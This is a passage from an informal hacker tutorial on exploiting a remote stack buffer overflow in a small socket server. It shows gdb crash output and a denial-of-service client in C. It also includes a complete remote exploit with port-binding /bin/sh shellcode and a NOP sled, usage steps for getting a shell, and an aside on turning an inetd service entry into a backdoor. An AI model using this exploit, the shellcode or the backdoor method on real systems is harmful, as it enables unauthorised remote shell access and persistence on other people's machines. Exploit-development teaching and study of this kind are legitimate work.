telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now the telnet client should be disconnected... but why? Let's look at the output of gdb:
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
// Don’t close gdb !!
What happened? As we can see, the eip is set to 0x41414141, probably you are asking why?
OK, I’ll try to explain it. 0x41 stands for an ‘A’... as we put over 1024 bytes in, the program has tried to copy the string name[2048] into
buffer[1024].... so because the string in name[2048] was greater than 1024 bytes, the name buffer has overwritten the buffer
and also overwritten the saved eip (extended instruction pointer, here is the returnaddress stored).. so our buffer
looks like this:
[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]
[xxxxx buffer-only-1024-bytes xxx] [EIP]
Ok our stack should look like this. We’ve tried to put more than 1024 byte into buffer, and then we’ve overwritten the eip *g*.
// don't forget .. eip has a size of 4 bytes !

After you overwrote the whole returnaddress, the function wanted to return to the main function, it jumped to the
wrong address (0x41414141) .... and so there was a segmentation fault.
Now here's a DoS tool for this program:
------------------------------------- dos.c ------------------------------------------------------------
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
int main(int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char buffer[2048];
int s, i;
if(argc != 3)
{
fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
exit(0);
}
s = socket(AF_INET, SOCK_STREAM, 0);
if(s == -1)
{
perror("socket() failed\n");
exit(0);
}
host = gethostbyname(argv[1]);
if( host == NULL)
{
herror("gethostbyname() failed");
exit(0);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(atol(argv[2]));

if(connect(s, &addr, sizeof(addr)) == -1)
{
perror("couldn't connect so server\n");
exit(0);
}
/* Not difficult only filling buffer with A’s.... den sending nothing more */
for(i = 0; i < 2048 ; i++)
buffer[i] = 'A';

printf("buffer is: %s\n", buffer);
printf("buffer filled... now sending buffer\n");
send(s, buffer, strlen(buffer), 0);
printf("buffer sent.\n");
close(s);
return 0;
}
--------------------------------------------- EOF ------------------------------------------------------

4. Finding the return address

I only want to show you how the structure is of an remote exploit looks like, so let's find out what we are going to do:
First we open gdb and search for the esp... to find esp you can put in the gdb.. (I hope you didn't close gdb) after getting a SEGFAULT... ok now type this x/200bx $esp-200 in, so you should get an ouput of addresses... It should look like this :
(gdb) x/200bx $esp-200
0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
---Type <return> to continue, or q <return> to quit---
Ok know we know that we've overwritten the whole buffer, so let's take one of those addresses... I'll show you later
why this... (because we want to guess the address), maybe you know the NOP's technique... so it shouldn't be any problem to
make our exploit working as well.... or to make our chance bigger to guess the return-address.
Attention don’t take the nearest address near the end of the 0x41, take an address which is in the middle, we’ll overwrite it later with NOPs.

5. Structure of the exploit code
So we've got a possible return address, let's try to use it... the exploit code should be structured like this:
1. First let's find out the esp.. ok we've got it. (ok we've got an address near the esp, that isn't any problem, because we’ll fill the buffer with NOP's)... then you should find a good shellcode which binds a shell on a port... Don't forget: in remote exploits we can't use local exploit shellcodes.. ok we could, but it isn’t very clever. So we have to find another way to get a shell. What about a portbinder shellcode, which binds a shell on a port ??
Ok in the net are many of these portbinder shellcodes .. i.e. www.hack.co.za or my page *g*.
2. Declaring a buffer which is bigger than 1024 bytes... let's make it 1064 bytes, so there is no problem to overwrite eip.. so don't forget you only have to declare a buffer which is greater than 1024 bytes...
3. Let's prepare the buffer. Now let's first fill the whole buffer with NOP's:
memset(buffer, 0x90, 1064);

4. Let's copy the shellcode into the buffer
memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));
Here we put the shellcode in the middle of the buffer
Why? Ok, if we got enough NOPS at the beginnig, our chance is getting better to execute the shellcode
5. Let's terminate the Nullbyte in the buffer
buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal
6. Let's copy the returnaddress at the end of the buffer
for(i = 1022; i < 1059; i+=4)
{
((int *) &buffer[i]) = RET;
// RET is the returnaddress we want to use... #define in the header
}
We know that the buffer ends by 1024 bytes, but to get sure we begin on 1022, then we’re copying the returnaddress until we’ve got 1059 bytes.. that is enough because we've already overwritten the eip (we hope so *g*).
7. Let's add a \0 Nullbyte at the end of our prepared buffer:
buffer[1063] = 0x0;
Now we've prepared our buffer, now we only need to send it to the vulnerable host.. by port and host or ip.
-------------------------------------------- exploit.c --------------------------------------------------
/* Simple remote exploit, which binds a shell on port 3789
* by triton
*
* After return address was overwritten, you can connect
* with telnet or netcat to the victim host on Port 3789
* After you logged in... there’s nothing, but try to enter "id;" (don’t forget the semicolon)
* So you should get an output, ok you’ve got a shell *g*. Always use:
*
* <command>;
*
* execute.
*/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
//standard offset (probably must be modified)
#define RET 0xbffff5ec

int main(int argc, char *argv[]) {
char buffer[1064];
int s, i, size;
struct sockaddr_in remote;
struct hostent *host;
if(argc != 3) {
printf("Usage: %s target-ip port\n", argv[0]);
return -1;
}
// filling buffer with NOPs
memset(buffer, 0x90, 1064);
//copying shellcode into buffer
memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
// the previous statement causes a unintential Nullbyte at buffer[1000]
buffer[1000] = 0x90;
// Copying the return address multiple times at the end of the buffer...
for(i=1022; i < 1059; i+=4) {
* ((int *) &buffer[i]) = RET;
}
buffer[1063] = 0x0;
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL)
{
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
{
fprintf(stderr, "Error: Socket\n");
return -1;
}
//state Protocolfamily , then converting the hostname or IP address, and getting port number
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1)
{
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
// closing socket
close(s);
}
--------------------------------------------- EOF-------------------------------------------------------
7. Using the exploit
user@hackfreak~/ > gcc exploit.c –o exploit
user@hackfreak~/ > ./exploit <host> <port>
Now it should work If you got the right return address... or one of the right return addresses.
user@hackfreak~/ > telnet <host> 3879
If you’re connected then try to do this:
id;
uid=500(user) gid=500(user) groups=500(user)
As you can see, it works very well.

8. Getting root privileges
Do the following:
user@hackfreak~/ > su (Or Use sudo su )
password: ******
root@hackfreak~/ > ls –ln vulnerable
-rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable
root@hackfreak~/ > chown root vulnerable
root@hackfreak~/ > chmod 6755 vulnerable
root@hackfreak~/ > ./vulnerable <port>
Now you can exploit the server program, and you should get a root shell *g*
9. Enter the service in inetd.conf
Ok we’re interested how the program, would work, if it would be a deamon. Now do the following:
First copy the vulnerable pogram to /usr/bin/
root@hackfreak~/ > cp vulnerable /usr/bin/vulnerable
Now let’s modify some files...
root@hackfreak~/ > vi /etc/services
(Feel free to use your favourite editor instead of vi)
Define a port which you wanna take. I’ll take the port 1526, now let’s enter this informations into /etc/services
vulnerable 1526/tcp # defining port for our server program, save and quit
Now edit the inetd.conf file
root@hackfreak~/ > vi /etc/inetd.conf
put in:
vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526
Now safe the inetd.conf file and quit.
root@hackfreak~/ > killall –HUP inetd
Now restart inetd and everything should work..
Note: This is also a good way to make a backdoor, adding a service in /etc/services then, add the things in inetd.conf and right /bin/sh sh –i or sh –h *g*....
9. Problem solutions
If the exploit doesn’t work, please think about the return address, it could be wrong, test it with gdb....
root@hackfreak~/ > gdb vulnerable
.....
(gdb) run <port>
Now you can exploit the program, if it doesn’t work look at the output of gdb, and try to find out the address, like in Chapter 4.
If there any other problems ... read the remarks *g*.
10. Remarks
If you find a bug, please mail me(Find that on my home page), so I can correct the current Version. If you want to criticize my english, I’ll delete your message :-) *nobody’s perfect*, but if you really got problems to understand this, please ask me... But please do not tease me with stupid question, I don’t have the time to answer every question.
If you want to put this text on your page, no problem, but please do not change the copyright or other things....
11. Greets
Thanks to Maverick for the vulnerable programm *hehe* (in his Tutorial "Socket Programming"),
thanks to triton for the exploitcode (great man, also member of buha-security.de)

Guys Check this Out tooo

http://www.remote-exploit.org/ and Exploit DB and get ur Skills Sharpen

Thanks,
H4ckfreak